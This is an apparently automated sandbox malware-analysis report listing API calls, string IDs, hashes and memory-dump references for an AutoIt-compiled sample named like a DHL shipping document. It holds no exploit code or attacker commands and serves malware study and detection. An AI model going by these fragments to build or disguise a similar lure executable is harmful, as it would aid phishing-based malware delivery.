                                                                                      • Instruction Fuzzy Hash: 4F3138B5E00309AFDB14CFA9C985BDABBB5FF49304F10506AE904AB381D770A941CF90
                                                                                      APIs
                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E3327C
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E33287
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID: Combobox
                                                                                      • API String ID: 3850602802-2096851135
                                                                                      • Opcode ID: cb186efecfdb87492124536a8dcbcadfb09eae93a4a6b42ef5d9120aa1224679
                                                                                      • Instruction ID: 2d29dcf9ba481c0fa6dcfe958f3ef9775d54b1f4bb854382e219317a751e9268
                                                                                      • Opcode Fuzzy Hash: cb186efecfdb87492124536a8dcbcadfb09eae93a4a6b42ef5d9120aa1224679
                                                                                      • Instruction Fuzzy Hash: 851193713002086FEF259E64DC89EBB3B5AEB54368F105628F518B72A1D6719D51C760
                                                                                      APIs
                                                                                        • Part of subcall function 00DA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00DA604C
                                                                                        • Part of subcall function 00DA600E: GetStockObject.GDI32(00000011), ref: 00DA6060
                                                                                        • Part of subcall function 00DA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DA606A
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E3377A
                                                                                      • GetSysColor.USER32(00000012), ref: 00E33794
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                      • String ID: static
                                                                                      • API String ID: 1983116058-2160076837
                                                                                      • Opcode ID: 28e45d39bf1d238c1bd1a246d51122137a1afb6fdac578e0843316fb0096cb46
                                                                                      • Instruction ID: 1ac92a3e525ad43f2f126ef4a79a5771218b868a802c4b83a0304b339d0690e3
                                                                                      • Opcode Fuzzy Hash: 28e45d39bf1d238c1bd1a246d51122137a1afb6fdac578e0843316fb0096cb46
                                                                                      • Instruction Fuzzy Hash: 941126B2610209AFDF00DFB8CC4AEEA7BB8EB08314F105925F955E2250E735E865DB60
                                                                                      APIs
                                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E1CD7D
                                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E1CDA6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$OpenOption
                                                                                      • String ID: <local>
                                                                                      • API String ID: 942729171-4266983199
                                                                                      • Opcode ID: 3759e68b6aead903a129a66f249df5fbca3968926706af3555e3b86e167d2111
                                                                                      • Instruction ID: e685677b423b611faf9a02871e26f6c0a90610aa0146723aeac215a37deed68d
                                                                                      • Opcode Fuzzy Hash: 3759e68b6aead903a129a66f249df5fbca3968926706af3555e3b86e167d2111
                                                                                      • Instruction Fuzzy Hash: D01106B12816357AD7344B66AC48EE7BE6CEF127A8F206226B109E3080D37098C1D6F0
                                                                                      APIs
                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00E334AB
                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E334BA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                      • String ID: edit
                                                                                      • API String ID: 2978978980-2167791130
                                                                                      • Opcode ID: 98199496fcfacefc98f3d04a8764b6516b11a5a9aade17147e25b197e5225651
                                                                                      • Instruction ID: 3522a816177f301f0da6c8da83a2ae7a477a9ece948d19069ff055429638de42
                                                                                      • Opcode Fuzzy Hash: 98199496fcfacefc98f3d04a8764b6516b11a5a9aade17147e25b197e5225651
                                                                                      • Instruction Fuzzy Hash: 12115B71100208AFEB118F749C48EAA3BAAEB05778F616324F975B31E0C671DC95D761
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00E06CB6
                                                                                      • _wcslen.LIBCMT ref: 00E06CC2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: STOP
                                                                                      • API String ID: 1256254125-2411985666
                                                                                      • Opcode ID: 82cce98f0d8adf379915db1bea23315b447ba640d15305a16f6aaaff7acc8d91
                                                                                      • Instruction ID: f74b10393a5f56da4332ed1f6375ab8459c227a6989f44a0ec459d7ef356e82a
                                                                                      • Opcode Fuzzy Hash: 82cce98f0d8adf379915db1bea23315b447ba640d15305a16f6aaaff7acc8d91
                                                                                      • Instruction Fuzzy Hash: 6B01C4327005268BDB20AFFDDC91BBFB7B5EB617147101929E852B71D4EB31D9A0C660
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E03CCA
                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E01D4C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 4c986a0b886182a1179a396e36a0b20aa228c8152e89dbde557ad2caab630c7b
                                                                                      • Instruction ID: 60891fc7af1a10e2c250e32c1b76dc32bd808dab9417fdf83a12f8d15c488f35
                                                                                      • Opcode Fuzzy Hash: 4c986a0b886182a1179a396e36a0b20aa228c8152e89dbde557ad2caab630c7b
                                                                                      • Instruction Fuzzy Hash: BF01D871641219ABCB14EBB4CC65CFEB7A8EB47394B141559F8227B2C1EA3059488771
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E03CCA
                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E01C46
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 52f3e3951db702e02d990196f13a9164b81454536fea73cdb24b8f54872b7bb0
                                                                                      • Instruction ID: 87c7e3337aec50ce2cda27071b4e68cceb8e5e0704aea8932610a8492031e73d
                                                                                      • Opcode Fuzzy Hash: 52f3e3951db702e02d990196f13a9164b81454536fea73cdb24b8f54872b7bb0
                                                                                      • Instruction Fuzzy Hash: 4C01AC7578110467DB18E7A0C9A1AFFF7A8DB12380F141055B406771C1EA24DE988671
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E03CCA
                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E01CC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 8f746be1ecd018192d113ad83edfbaf7782fac89d433cc05bb24f86ff23af2e4
                                                                                      • Instruction ID: fcd14c2db58e1cd1e5d16ac9c1ba41c72a202b074b5c51d9dbff920a680787e8
                                                                                      • Opcode Fuzzy Hash: 8f746be1ecd018192d113ad83edfbaf7782fac89d433cc05bb24f86ff23af2e4
                                                                                      • Instruction Fuzzy Hash: 1701DBB178021867DB18E7A0CA51AFEF7ECDB12380F141015B841772C1EA20DF58C671
                                                                                      APIs
                                                                                        • Part of subcall function 00DA9CB3: _wcslen.LIBCMT ref: 00DA9CBD
                                                                                        • Part of subcall function 00E03CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E03CCA
                                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E01DD3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                                      • String ID: ComboBox$ListBox
                                                                                      • API String ID: 624084870-1403004172
                                                                                      • Opcode ID: 06c6d1fad603f18db5a466d051e29140d5d1b47cf1c8ea2a221237e2666e771f
                                                                                      • Instruction ID: 1a62cc9d031eca6937777ba1e7091d7a1b92b4c97022e9def681f9fd09490088
                                                                                      • Opcode Fuzzy Hash: 06c6d1fad603f18db5a466d051e29140d5d1b47cf1c8ea2a221237e2666e771f
                                                                                      • Instruction Fuzzy Hash: 39F0A471B4161866DB14E7A4CCA2AFEB7ACEB02394F041915F862B72C1DA7059488271
                                                                                      APIs
                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E73018,00E7305C), ref: 00E381BF
                                                                                      • CloseHandle.KERNEL32 ref: 00E381D1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: \0
                                                                                      • API String ID: 3712363035-3218720685
                                                                                      • Opcode ID: 155352378f49430b7a3a945749017f75bb27b4b2daa2805e85fd3b9f4c645b8f
                                                                                      • Instruction ID: 41fcd9b17469a81a1511ed78d408f1b05e6b6445192a37312de47b4ad8106f8e
                                                                                      • Opcode Fuzzy Hash: 155352378f49430b7a3a945749017f75bb27b4b2daa2805e85fd3b9f4c645b8f
                                                                                      • Instruction Fuzzy Hash: 41F082B2640304BEE360A772AC4AFB73E5CDB05750F004464BB4CF61A2D6798E58A3F9
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen
                                                                                      • String ID: 3, 3, 16, 1
                                                                                      • API String ID: 176396367-3042988571
                                                                                      • Opcode ID: 3ee96e3fcc175425ccecf3927a702be196db14be2d6cccbd490f92e2228ececf
                                                                                      • Instruction ID: 3b61b3cd0a35a9a88f6758368f8ba2d60738f2ca1b421a1464d36ce1533e2559
                                                                                      • Opcode Fuzzy Hash: 3ee96e3fcc175425ccecf3927a702be196db14be2d6cccbd490f92e2228ececf
                                                                                      • Instruction Fuzzy Hash: 2BE02B026043315092713279BCC1EBF5A89DFC57A4710382FF9D1E3266EEA48D9193B0
                                                                                      APIs
                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E00B23
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                      • API String ID: 2030045667-4017498283
                                                                                      • Opcode ID: 9d9b182ebe6db3f2fb359c08957dfac06995e251efbd9dfa0a198fb76ee463cf
                                                                                      • Instruction ID: 1280d2dc98e46dfd20ab8920044b4c88d4a314d3cdc3d7755e3e7e8417360555
                                                                                      • Opcode Fuzzy Hash: 9d9b182ebe6db3f2fb359c08957dfac06995e251efbd9dfa0a198fb76ee463cf
                                                                                      • Instruction Fuzzy Hash: C8E04F322843186AD21437957C07FD97E88CF06B65F20146AFB98B55C38AE2A59087B9
                                                                                      APIs
                                                                                        • Part of subcall function 00DBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00DC0D71,?,?,?,00DA100A), ref: 00DBF7CE
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00DA100A), ref: 00DC0D75
                                                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DA100A), ref: 00DC0D84
                                                                                      Strings
                                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00DC0D7F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                      • API String ID: 55579361-631824599
                                                                                      • Opcode ID: d094ff791877e081451b36af3d0127486442859169ea5680eabbe9ca1c790e3a
                                                                                      • Instruction ID: da51ae4d2f0eddcbb060dcb57495a70b5ef3b6312ba452f08f17e4335d5736fe
                                                                                      • Opcode Fuzzy Hash: d094ff791877e081451b36af3d0127486442859169ea5680eabbe9ca1c790e3a
                                                                                      • Instruction Fuzzy Hash: 8EE039702007128FD3209FAAD8087427FE0AB00741F048A6DE887E7A61DBB4E4498BB1
                                                                                      APIs
                                                                                      • __Init_thread_footer.LIBCMT ref: 00DBE3D5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: Init_thread_footer
                                                                                      • String ID: 0%$8%
                                                                                      • API String ID: 1385522511-2949748613
                                                                                      • Opcode ID: f9b88c625c4f2e6f77664a54cb3a417c14a6e4e24c07670af4b8af4f88922879
                                                                                      • Instruction ID: ed7a61a8c6a4a964a8a2137be7d62514e8730360d45fa766875290c75eecab09
                                                                                      • Opcode Fuzzy Hash: f9b88c625c4f2e6f77664a54cb3a417c14a6e4e24c07670af4b8af4f88922879
                                                                                      • Instruction Fuzzy Hash: 92E02631400A10CFC604E72AB855EC83391EB49329B14E16CE30BA72D39B30A881877A
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: %.3d$X64
                                                                                      • API String ID: 481472006-1077770165
                                                                                      • Opcode ID: 252fccbc31fc0d63322202faacaecc19b973e37bc3e054c0cde1fbf279b09029
                                                                                      • Instruction ID: de6f776b0e3ea8e3b8141a49bb86acb5c077aa3f2e4b5441dbc250c0cf9757ed
                                                                                      • Opcode Fuzzy Hash: 252fccbc31fc0d63322202faacaecc19b973e37bc3e054c0cde1fbf279b09029
                                                                                      • Instruction Fuzzy Hash: 93D0126184810CE9CB5097D0DC498FAB77EEB09341F61C452FA87A1040E634C50867B5
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3236C
                                                                                      • PostMessageW.USER32(00000000), ref: 00E32373
                                                                                        • Part of subcall function 00E0E97B: Sleep.KERNEL32 ref: 00E0E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_da0000_DHL 073412182024.jbxd
                                                                                      Similarity
                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                      • String ID: Shell_TrayWnd
                                                                                      • API String ID: 529655941-2988720461
                                                                                      • Opcode ID: 185e42465629573856d2110fe374bbd2271db23848907742d24c71e2d7a6fe5a
                                                                                      • Instruction ID: 975cf1803af7c6e4c72a831a03e680aa83231cf8b52798136394bacda2d32b36
                                                                                      • Opcode Fuzzy Hash: 185e42465629573856d2110fe374bbd2271db23848907742d24c71e2d7a6fe5a
                                                                                      • Instruction Fuzzy Hash: AAD0A9323C03007BE264A331AC0FFC67A049B40B00F1009127241BA1E0C8A0B8048B04
                                                                                      APIs
                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E3232C
                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E3233F
                                                                                        • Part of subcall function 00E0E97B: Sleep.KERNEL32 ref: 00E0E9F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1750656233.0000000000DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DA0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1750638343.0000000000DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750825632.0000000000E62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750868991.0000000000E6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1750885695.0000000000E74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
